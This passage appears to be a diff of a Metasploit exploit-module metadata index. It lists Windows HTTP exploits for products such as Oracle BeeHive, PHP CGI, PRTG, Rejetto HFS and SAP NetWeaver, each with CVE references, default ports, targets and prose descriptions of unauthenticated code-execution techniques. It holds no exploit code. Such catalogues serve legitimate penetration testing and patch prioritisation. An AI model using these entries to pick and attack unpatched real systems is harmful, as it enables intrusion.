"exploit/windows/http/oracle_beehive_prepareaudiotoplay", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-11-10", + "type": "exploit", + "author": [ + "mr_me ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM. 
Authentication is not\n required to exploit this vulnerability.", + "references": [ + "ZDI-15-550", + "URL-http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" + ], + "platform": "Windows", + "arch": "", + "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Beehive 2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_beehive_prepareaudiotoplay", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/oracle_btm_writetofile": { + "name": "Oracle Business Transaction Management FlashTunnelService Remote Code Execution", + "fullname": "exploit/windows/http/oracle_btm_writetofile", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-07", + "type": "exploit", + "author": [ + "rgod ", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits abuses the FlashTunnelService SOAP web service on Oracle\n Business Transaction Management 12.1.0.7 to upload arbitrary files, without\n authentication, using the WriteToFile method. The same method contains a directory\n traversal vulnerability, which allows to upload the files to arbitrary locations.\n\n In order to execute remote code two techniques are provided. If the Oracle app has\n been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web\n root. If a new Domain has been used to deploy the Oracle application, the Windows\n Management Instrumentation service can be used to execute arbitrary code.\n\n Both techniques have been successfully tested on default installs of Oracle BTM\n 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. 
Default path traversal depths are\n provided, but the user can configure the traversal depth using the DEPTH option.", + "references": [ + "OSVDB-85087", + "BID-54839", + "EDB-20318" + ], + "platform": "Java,Windows", + "arch": "", + "rport": 7001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java", + "Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/http/oracle_btm_writetofile.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_btm_writetofile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/oracle_endeca_exec": { + "name": "Oracle Endeca Server Remote Command Execution", + "fullname": "exploit/windows/http/oracle_endeca_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-07-16", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a command injection vulnerability on the Oracle Endeca\n Server 7.4.0. The vulnerability exists on the createDataStore method from the\n controlSoapBinding web service. The vulnerable method only exists on the 7.4.0\n branch and isn't available on the 7.5.5.1 branch. In addition, the injection\n has been found to be Windows specific. 
This module has been tested successfully\n on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).", + "references": [ + "CVE-2013-3763", + "BID-61217", + "OSVDB-95269", + "ZDI-13-190", + "URL-http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 7770, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/http/oracle_endeca_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_endeca_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oracle_event_processing_upload": { + "name": "Oracle Event Processing FileUploadServlet Arbitrary File Upload", + "fullname": "exploit/windows/http/oracle_event_processing_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-04-21", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits an arbitrary file upload vulnerability in Oracle Event Processing\n 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be\n abused to upload a malicious file onto an arbitrary location due to a directory traversal\n flaw, and compromise the server. By default Oracle Event Processing uses a Jetty\n Application Server without JSP support, which limits the attack to WbemExec. 
The current\n WbemExec technique only requires arbitrary write to the file system, but at the moment the\n module only supports Windows 2003 SP2 or older.", + "references": [ + "CVE-2014-2424", + "ZDI-14-106", + "BID-66871", + "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": 9002, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle_event_processing_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_event_processing_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/osb_uname_jlist": { + "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", + "fullname": "exploit/windows/http/osb_uname_jlist", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-07-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability\n in login.php. 
In conjunction with the authentication bypass issue,\n the 'jlist' parameter in property_box.php can be used to execute\n arbitrary system commands.\n This module was tested against Oracle Secure Backup version 10.3.0.1.0", + "references": [ + "CVE-2010-0904", + "OSVDB-66338", + "ZDI-10-118" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/http/osb_uname_jlist.rb", + "is_install_path": true, + "ref_name": "windows/http/osb_uname_jlist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/peercast_url": { + "name": "PeerCast URL Handling Buffer Overflow", + "fullname": "exploit/windows/http/peercast_url", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-03-08", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", + "references": [ + "CVE-2006-1148", + "OSVDB-23777", + "BID-17040" + ], + "platform": "Windows", + "arch": "", + "rport": 7144, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English SP0-SP4", + "Windows 2003 English SP0-SP1", + "Windows XP English SP0/SP1", + "Windows XP English SP0/SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/peercast_url.rb", + "is_install_path": true, + "ref_name": "windows/http/peercast_url", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/http/pgadmin_binary_path_api": { + "name": "pgAdmin Binary Path API RCE", + "fullname": "exploit/windows/http/pgadmin_binary_path_api", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-03-28", + "type": "exploit", + "author": [ + "M.Selim Karahan", + "Mustafa Mutlu", + "Ayoub Mokhtar" + ], + "description": "pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)\n vulnerability through the validate binary path API. This vulnerability\n allows attackers to execute arbitrary code on the server hosting PGAdmin,\n posing a severe risk to the database management system's integrity and the security of the underlying data.\n\n Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.", + "references": [ + "CVE-2024-3116", + "URL-https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/", + "URL-https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2025-04-11 15:55:46 +0000", + "path": "/modules/exploits/windows/http/pgadmin_binary_path_api.rb", + "is_install_path": true, + "ref_name": "windows/http/pgadmin_binary_path_api", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/php_apache_request_headers_bof": { + "name": "PHP apache_request_headers Function Buffer Overflow", + "fullname": "exploit/windows/http/php_apache_request_headers_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-08", + "type": 
"exploit", + "author": [ + "Vincent Danen", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in the CGI version of PHP\n 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the\n HTTP headers.\n\n This module has been tested against the thread safe version of PHP 5.4.2,\n from \"windows.php.net\", running with Apache 2.2.22 from \"apachelounge.com\".", + "references": [ + "CVE-2012-2329", + "OSVDB-82215", + "BID-53455", + "URL-http://www.php.net/archive/2012.php#id2012-05-08-1", + "URL-http://www.php.net/ChangeLog-5.php#5.4.3", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/php_apache_request_headers_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/php_apache_request_headers_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/php_cgi_arg_injection_rce_cve_2024_4577": { + "name": "PHP CGI Argument Injection Remote Code Execution", + "fullname": "exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-06", + "type": "exploit", + "author": [ + "Orange Tsai", + "watchTowr", + "sfewer-r7" + ], + "description": "This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations\n on a Windows target. 
A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that\n the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)\n character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose\n the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),\n and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.\n\n XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target\n an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.", + "references": [ + "CVE-2024-4577", + "URL-https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/", + "URL-https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/" + ], + "platform": "PHP,Windows", + "arch": "php, cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows PHP", + "Windows Command" + ], + "mod_time": "2024-06-13 15:10:14 +0000", + "path": "/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb", + "is_install_path": true, + "ref_name": "windows/http/php_cgi_arg_injection_rce_cve_2024_4577", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/plesk_mylittleadmin_viewstate": { + "name": "Plesk/myLittleAdmin ViewState .NET Deserialization", + "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": 
"2020-05-15", + "type": "exploit", + "author": [ + "Spencer McIntyre", + "wvu " + ], + "description": "This module exploits a ViewState .NET deserialization vulnerability in\n web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n and likely older versions, due to hardcoded parameters in\n the web.config file for ASP.NET.\n\n Popular web hosting control panel Plesk offers myLittleAdmin as an\n optional component that is selected automatically during \"full\"\n installation. This exploit caters to the Plesk target, though it\n should work fine against a standalone myLittleAdmin setup.\n\n Successful exploitation results in code execution as the user running\n myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n the \"SQL Admin MSSQL anonymous account.\"\n\n Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.", + "references": [ + "CVE-2020-13166", + "URL-https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", + "URL-https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 8401, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-03-31 12:07:57 +0000", + "path": "/modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/plesk_mylittleadmin_viewstate", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/plex_unpickle_dict_rce": { + "name": "Plex Unpickle Dict Windows RCE", + "fullname": 
"exploit/windows/http/plex_unpickle_dict_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-05-07", + "type": "exploit", + "author": [ + "h00die", + "Chris Lyne" + ], + "description": "This module exploits an authenticated Python unsafe pickle.load of a Dict file. An authenticated attacker\n can create a photo library and add arbitrary files to it. After setting the Windows only Plex variable\n LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes\n an RCE as the user who started Plex.\n Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab\n the X-Plex-Token header. See info -d for additional details.\n If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required\n as subsuquent writes will make Dict-1, and not execute.", + "references": [ + "URL-https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py", + "URL-https://www.tenable.com/security/research/tra-2020-32", + "URL-http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/", + "URL-https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819", + "CVE-2020-5741" + ], + "platform": "Python", + "arch": "python", + "rport": 32400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/plex_unpickle_dict_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/plex_unpickle_dict_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ] + }, + "session_types": 
false, + "needs_cleanup": true + }, + "exploit_windows/http/privatewire_gateway": { + "name": "Private Wire Gateway Buffer Overflow", + "fullname": "exploit/windows/http/privatewire_gateway", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-06-26", + "type": "exploit", + "author": [ + "Michael Thumann " + ], + "description": "This exploits a buffer overflow in the ADMCREG.EXE used\n in the PrivateWire Online Registration Facility.", + "references": [ + "CVE-2006-3252", + "OSVDB-26861", + "BID-18647" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 English SP0", + "Windows 2000 English SP1", + "Windows 2000 English SP2", + "Windows 2000 English SP3", + "Windows 2000 English SP4", + "Windows 2003 English SP0/SP1", + "Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/privatewire_gateway.rb", + "is_install_path": true, + "ref_name": "windows/http/privatewire_gateway", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/prtg_authenticated_rce": { + "name": "PRTG Network Monitor Authenticated RCE", + "fullname": "exploit/windows/http/prtg_authenticated_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-06-25", + "type": "exploit", + "author": [ + "Josh Berry ", + "Julien Bedel " + ], + "description": "Notifications can be created by an authenticated user and can execute scripts when triggered.\n Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.\n The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE 
using a Powershell payload.\n It may require a few tries to get a shell because notifications are queued up on the server.\n This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.", + "references": [ + "CVE-2018-9276", + "URL-https://www.codewatch.org/blog/?p=453" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/prtg_authenticated_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/prtg_authenticated_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects", + "config-changes", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/prtg_authenticated_rce_cve_2023_32781": { + "name": "PRTG CVE-2023-32781 Authenticated RCE", + "fullname": "exploit/windows/http/prtg_authenticated_rce_cve_2023_32781", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-09", + "type": "exploit", + "author": [ + "Kevin Joensen " + ], + "description": "Authenticated RCE in Paessler PRTG", + "references": [ + "URL-https://baldur.dk/blog/prtg-rce.html", + "CVE-2023-32781" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch", + "Windows_CMDStager" + ], + "mod_time": "2024-01-22 10:10:14 +0000", + "path": "/modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb", + "is_install_path": true, + "ref_name": 
"windows/http/prtg_authenticated_rce_cve_2023_32781", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/psoproxy91_overflow": { + "name": "PSO Proxy v0.91 Stack Buffer Overflow", + "fullname": "exploit/windows/http/psoproxy91_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-02-20", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.", + "references": [ + "CVE-2004-0313", + "OSVDB-4028", + "EDB-156", + "BID-9706" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Pro SP0-4 English", + "Windows 2000 Pro SP0-4 French", + "Windows 2000 Pro SP0-4 Italian", + "Windows XP Pro SP0/1 English", + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/psoproxy91_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/psoproxy91_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/rabidhamster_r4_log": { + "name": "RabidHamster R4 Log Entry sprintf() Buffer Overflow", + "fullname": "exploit/windows/http/rabidhamster_r4_log", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-09", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a 
stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.", + "references": [ + "OSVDB-79007", + "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "R4 v1.25" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb", + "is_install_path": true, + "ref_name": "windows/http/rabidhamster_r4_log", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/rejetto_hfs_exec": { + "name": "Rejetto HttpFileServer Remote Command Execution", + "fullname": "exploit/windows/http/rejetto_hfs_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-09-11", + "type": "exploit", + "author": [ + "Daniele Linguaglossa ", + "Muhamad Fadzil Ramli " + ], + "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. 
This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.", + "references": [ + "CVE-2014-6287", + "OSVDB-111386", + "URL-https://seclists.org/bugtraq/2014/Sep/85", + "URL-http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2021-05-09 12:40:48 +0000", + "path": "/modules/exploits/windows/http/rejetto_hfs_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/rejetto_hfs_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/rejetto_hfs_rce_cve_2024_23692": { + "name": "Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/http/rejetto_hfs_rce_cve_2024_23692", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-05-25", + "type": "exploit", + "author": [ + "sfewer-r7", + "Arseniy Sharoglazov" + ], + "description": "The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template\n injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges\n of the user account running the HFS.exe server process. This exploit has been tested to work against version\n 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers\n and no patch is available. 
Users are recommended to upgrade to newer supported versions.", + "references": [ + "CVE-2024-23692", + "URL-https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-06-11 16:26:04 +0000", + "path": "/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb", + "is_install_path": true, + "ref_name": "windows/http/rejetto_hfs_rce_cve_2024_23692", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sambar6_search_results": { + "name": "Sambar 6 Search Results Buffer Overflow", + "fullname": "exploit/windows/http/sambar6_search_results", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-06-21", + "type": "exploit", + "author": [ + "hdm ", + "Andrew Griffiths ", + "aushack " + ], + "description": "This module exploits a buffer overflow found in the\n /search/results.stm application that comes with Sambar 6.\n This code is a direct port of Andrew Griffiths's SMUDGE\n exploit, the only changes made were to the nops and payload.\n This exploit causes the service to die, whether you provided\n the correct target or not.", + "references": [ + "CVE-2004-2086", + "OSVDB-5786", + "BID-9607" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000", + "Windows XP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sambar6_search_results.rb", + "is_install_path": true, + "ref_name": 
"windows/http/sambar6_search_results", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sap_configservlet_exec_noauth": { + "name": "SAP ConfigServlet Remote Code Execution", + "fullname": "exploit/windows/http/sap_configservlet_exec_noauth", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-11-01", + "type": "exploit", + "author": [ + "Dmitry Chastuhin", + "Andras Kabai" + ], + "description": "This module allows remote code execution via operating system commands through the\n SAP ConfigServlet without any authentication. This module has been tested successfully\n with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.", + "references": [ + "OSVDB-92704", + "EDB-24996", + "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows generic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb", + "is_install_path": true, + "ref_name": "windows/http/sap_configservlet_exec_noauth", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/sap_host_control_cmd_exec": { + "name": "SAP NetWeaver HostControl Command Injection", + "fullname": "exploit/windows/http/sap_host_control_cmd_exec", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-08-14", + "type": "exploit", + "author": [ + "Michael Jordon", + "juan vazquez " + ], + "description": "This module exploits a command injection vulnerability in the SAPHostControl\n Service, by sending a specially crafted SOAP request to the management 
console.\n\n In order to deal with the spaces and length limitations, a WebDAV service is\n created to run an arbitrary payload when accessed as a UNC path. Because of this,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n It is enabled and automatically started by default on Windows XP SP3, but disabled\n by default on Windows 2003 SP2.", + "references": [ + "OSVDB-84821", + "URL-http://www.contextis.com/research/blog/sap4/", + "URL-https://websmp130.sap-ag.de/sap/support/notes/1341333" + ], + "platform": "Windows", + "arch": "", + "rport": 1128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/sap_host_control_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/sap_host_control_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sapdb_webtools": { + "name": "SAP DB 7.4 WebTools Buffer Overflow", + "fullname": "exploit/windows/http/sapdb_webtools", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-07-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n By sending an overly long GET request, it may be possible for\n an attacker to execute 